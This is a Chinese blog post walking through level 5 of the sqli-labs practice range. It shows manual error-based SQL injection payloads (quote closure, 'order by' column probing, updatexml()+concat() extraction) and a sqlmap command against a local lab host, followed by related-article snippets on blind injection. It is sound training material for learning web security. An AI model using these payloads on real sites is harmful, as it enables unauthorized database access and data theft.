Sqli-labs靶场第5关详解[Sqli-labs-less-5]

最新推荐文章于 2024-06-06 11:11:56 发布
最新推荐文章于 2024-06-06 11:11:56 发布
阅读量1.5k 收藏 15
点赞数 31
分类专栏: sqli-labs 文章标签: 数据库 web安全 网络安全 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73615178/article/details/136186257
版权

Sqli-labs-Less-5

前言:

SQL注入的三个条件:
①参数可控;(从参数输入就知道参数可控)
②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)
③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)

    利用 order by 来测列数

    测显位:mysql用1,2,3,4

 Mysql获取相关数据:

    一、数据库版本-看是否认符合information_schema查询-version()
    二、数据库用户-看是否符合root型注入攻击-user()
    三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os
    四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()

 sql注入——报错注入(Error-based)

sqlmap 会替换或者添加用于引发特定数据库错误的 SQL 语句到查询参数里面,并通过解析对应的注入结果,判断特定的数据库错误信息是否存在响应的 headers/body 中。这项技术只有在 Web 应用配置开启后端 DBMS 错误信息提醒才有效。

MySQL提供了一个 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。

updatexml(xml_target, xpath_expr, new_val)

  • xml_target 是要更新的 XML 列或变量。
  • xpath_expr 是要更新的 XML 节点的路径表达式。
  • new_val 是要替换节点值的新值。

 #手工注入

1.根据提示id传参/?id=1,显示You are in...........

/?id=0  显示空 , 即当id值不存在时,前端显示为空

/?id=1'   显示near ''1'' LIMIT 0,1' at line 1   即闭合为 单引号' 闭合

/?id=1' order by 4 --+    即当值为4时报错,所以列数为3

利用联合查询union 发现仍然显示You are in...........

根据前面的测试,发现联合查询用不了,猜测后台代码逻辑当id 正确执行时显示  You are in...........  ,id错误时为空,代码报错显示报错情况。

所以,这题可使用报错注入试试,updatexml()函数+concat():拼接特殊符号和查询结果

http://192.168.0.7:802/sqli-labs/Less-5/?id=0' and updatexml(1,concat(1,(select user())),1)--+

成功利用漏洞!!!

 #自动化注入-SQLmap工具注入

SQLmap用户手册:文档介绍 - sqlmap 用户手册

python sqlmap.py -u http://192.168.0.7:802/sqli-labs/Less-5/?id=1 --current-user

 爆当前用户为root@localhost。

「已注销」
关注
  • 31
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场1-5
2302_80044238的博客
01-27 1153
输入:(解析:updatexml()是一个用于修改XML数据的SQL函数 1 是XML中的路径,concat()用于将0x7e和selectdatabase()函数拼接起来,0x7e是十六进制表示~特殊符号会导致查询出错从而爆出数据 (0x7e也可使用其他符号代替但是需要加上单引号))当我们尝试不闭合还有单引号闭合两种方法时发现页面反馈给我们的时sql语法不正确也就是我们所注入的sql攻击语句是无法执行的,此时我们可以去看看此网页的源代码(可以直接在小皮的根目录里面找对应的卡就可以找到)
sqli-labs 第五
m0_63711447的博客
04-01 4524
第五可以用很多种方法来做,报错型注入,二次查询注入等,这里用布尔盲注手工注入的方法来做 Less -5 1、输入?id=1,显示you are in 将1改为3,5等数字,仍然得相同结果,改为100,发现没有回显,由此可知正确的情况下会返回you are in,错误的情况下没有返回, 输入?id=1',出现报错信息,由此判断存在注入漏洞 2、使用order by 语句进行查列,order by 3的时候正常回显,order by 4无回显,说明有三列 3、对于这题不能使用联合查询,无.
sqli-labs 靶场 less-5、6 第五和第六:判断注入点、使用错误函数注入爆库名、updatexml()函数
最新发布
Superstacks超全栈
06-06 650
updatexml使用时,当xpath_string格式出现错误,mysql则会爆出xpath语法错误(xpath syntax)意味着只有报错的时候才会在页面显示数据,那么我们通过使用报错注释函数获取数据。updatexml()是一个使用不同的xml标记匹配和替换xml块的函数。XML_document:是string格式,为XML文档对象的名称。new_value:string格式,替换查找到的符合条件的数据。继续判断字段数量,当数字为3时没报错,得知为3个字段。输入正确不返回数据,则我们通过。
基于Sqli-Labs靶场SQL注入-第五(重点讲双查询注入)
Joker
11-19 4017
双查询是指两个查询语句的嵌套,也就是一个select语句中在去套一个select语句,然后利用group by 语句和floor函数的结合去报错,再将我们需要的信息显示到报错信息中。
sqli-labs通(五)
qq_65950075的博客
04-30 826
但是这一没有回显信息,输入正确就会出现以下信息,错误则会报错,说明存在布尔盲注,我们可以利用这个来进行判断。函数 substr(a,b,c),a是截取的字符串 ,b是截取的位置 ,c是截取的长度。length()函数是返回字符串的长度,先暂且猜测数据库名长度是1。开始攻击,8的返回长度不一样,所以猜测数据库名的长度就是8。然后就是逐个爆破后面字母,直到把8个字母的库名爆出来,但是。然后我们验证,显示正常,说明数据库名长度就是8。设置类型为数值,从1到20,步长为1。id=1,只有下面这种结果。
sqlilabs第五布尔盲注(burpsuite版)
qq_62044589的博客
04-04 1213
sqlilabs第五单引号闭合布尔盲注burpsuite。
sql-labs 闯 5~10
qq_44663230的博客
08-14 1528
sql-labs 第5~10 盲注系列
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
02-12
sqli-labs靶场
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs卡5(基于get提交的单引号闭合的报错盲注)通思路
zyh1588的博客
10-25 751
小白对sqli-labs第五的理解,欢迎大佬们来指点迷津
sqli-labs靶场第五
gou1791241251的博客
12-20 4392
第五与前面几都有所不同,话不多说,我们传入id=1进去看看吧! 此时页面回显信息为you are in… 第一步:判断注入类型,字符型还是数字型 从报错信息不难看出注入类型为字符型,且为单引号闭合 此步证实了单引号闭合 第二步:判断字段数(使用order by) order by 3时页面正常,order by 4时页面异常,说明有三个字段 页面有布尔类型状态,所以用布尔盲注,页面没有回显不能用联合查询,页面没有报错信息不能用报错注入。 使用length函数来判断数据库名长度是否为1,由图可
sqli-labs第五详解附加sqlmap使用
告白的博客
07-05 1689
0x00 判断注入类型 首先还是像之前一样判断注入类型,字段长度以及错误回显等,在这一发现无论怎么输入函数,永远只显示相同画面,错误输入则不显示,从此判断出这里不在使用联合注入查询,因为数据库不会回显输出字符,输出结果只存在0和1,程序已经禁止了数据库信息的返回显示。这是我们就要尝试进行盲注,可以尝试布尔型盲注、报错注入、时间延迟型盲注。这类型手工注入工程量很大,所以建议大家使用sqlmap,直接利用工具进行注入。 0x01 手工注入 1.采用布尔型注入 使用left(database(),n)函数猜
sqli-labs-----第五
wyzhxhn的博客
11-06 865
单引号字符型updatexml报错注入
Sqli-labs1~5解析
Lifelater的博客
01-26 844
>判断注入类型判断方法——字符型输入?id=1' and '1'=1,页面正常下一步继续输入?id=1' and '1'='2,页面错误,说明是字符型注入——数字型输入?id=1 and 1=1,页面正常下一步继续输入?id=1 and 1=2,页面错误,说明是数字型注入>>判断列数:?>>判断数据显示位置:?>>查询所有的表名:?>>查看user表中的列名?>>查看user表中的username这一列的值?>>查看user表中的密码这一列的值?
sqli-labs第五sql注入流程(重点讲updatexml函数的特性)
m0_74798594的博客
05-09 525
注:limit 1,1中前面的1可以换0,2,3... 帐号和密码中间的0是为了将二者分别开,没有特殊含义。通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。所以这应该是盲注。加上单引号后,发现会返回报错信息,且可以知道是单引号闭合的,可以考虑使用报错注入。使用报错的sql盲注有很多方法,本文使用updatexml函数的特性来进行报错注入。注:两个1都可以换成任意值不影响,这里主要是利用xpath的语法来爆相数据。测试id=1,没有显示数据。
sqli-labs第十五
09-02
很抱歉,我无法回答你的问题。因为你提供的引用内容似乎包含了一些与SQL注入攻击相的信息,这是一个违反用户隐私和信息安全的行为。我不能为你提供任何与此相的信息或支持。请记住在使用任何技术或工具时要遵守法律和道德规范,以确保您的行为合法和合理。如果您有其他非攻击性的问题,我将很乐意为您提供帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [sqli-labs第十五](https://blog.csdn.net/yuqnqi/article/details/130575295)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jeakinscheung-sqli-labs-php7-master.zip](https://download.csdn.net/download/weixin_42545836/12250964)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [sqli-labs(15)](https://blog.csdn.net/jimggg/article/details/104981616)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值